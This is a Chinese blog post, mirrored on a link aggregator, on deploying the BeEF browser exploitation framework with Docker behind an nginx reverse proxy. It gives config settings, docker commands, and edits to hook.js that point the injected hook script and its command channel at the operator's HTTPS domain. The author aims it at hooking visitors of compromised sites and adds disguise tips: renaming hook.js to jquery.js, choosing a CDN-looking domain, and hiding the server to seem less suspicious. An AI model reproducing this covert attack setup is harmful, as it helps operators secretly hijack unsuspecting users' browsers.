10
Docker安装BeEF并设置反代
source link: https://blog.moonlightwatch.com/%E6%B8%97%E9%80%8F%E7%AC%94%E8%AE%B0/2021/03/03/docker%E5%AE%89%E8%A3%85BeEF%E5%B9%B6%E8%AE%BE%E7%BD%AE%E5%8F%8D%E4%BB%A3.html
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
参考此处:BeEF Installation
可能需要修改:
用于登陆BeEF面板的用户名和密码 :
credentials:
user: "beef"
passwd: "beef"
Hook 脚本的名字和session_name(hook.js这个名字太敏感了):
hook_file: "/hook.js"
hook_session_name: "BEEFHOOK"
WebUI 的路径:
extension:
admin_ui:
enable: true
base_path: "/ui"
docker 部署
按照安装说明中的Docker部分。我们只需要:
-
修改配置文件
-
封装docker镜像
-
启动docker容器
三步即可。
docker build -t beef .
docker run -p 3000:3000 -p 6789:6789 -p 61985:61985 -p 61986:61986 --name beef beef
如果直接部署,我们可能面临以下问题:
- beef本身使用http协议,在现代浏览器的安全策略下,如果被侵入站点启用https,则beef的hook脚本无法加载。(虽说可以加证书,但为其单独申请,可能没必要)
- 暴露beef服务器,显得有些猖狂。
- 可以使用域名,降低可疑程度。
首先,需要修改配置文件。在配置文件中,http -> public 这个参数下,保存beef对外提供服务使用的域名。
http:
public: "www.domain.com"
另外,需要配置nginx:
server_name www.domain.com;
location / {
proxy_pass http://localhost:3000/;
}
写成这样就能使用,如果需要其他配置,可以自己加。
注意
这样配置,可能会导致 hook 脚本内的请求地址与实际地址不匹配。需要修改 hook.js ,并绕开beef,单独提供。
修改一,修改下述位置的 script.src 为反向代理后的位置:
hookChildFrames: function () {
// create script object
var script = document.createElement('script');
script.type = 'text/javascript';
script.src = 'https://www.domain.com/hook.js';
修改二,修改下述位置的 beef.net 部分,按实际情况修改即可:
beef.net = {
host: "www.domain.com",
port: "443",
hook: "/hook.js",
httpproto: "https",
handler: '/dh',
chop: 500,
pad: 30, //this is the amount of padding for extra params such as pc, pid and sid
sid_count: 0,
cmd_queue: [],
修改完后,可以正常使用。
- 可以适当修改 hook.js 的名字,比如改成 jquery.js 啥的。
- 可以选择适当的域名,比如 cdn.domain.com 啥的。
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK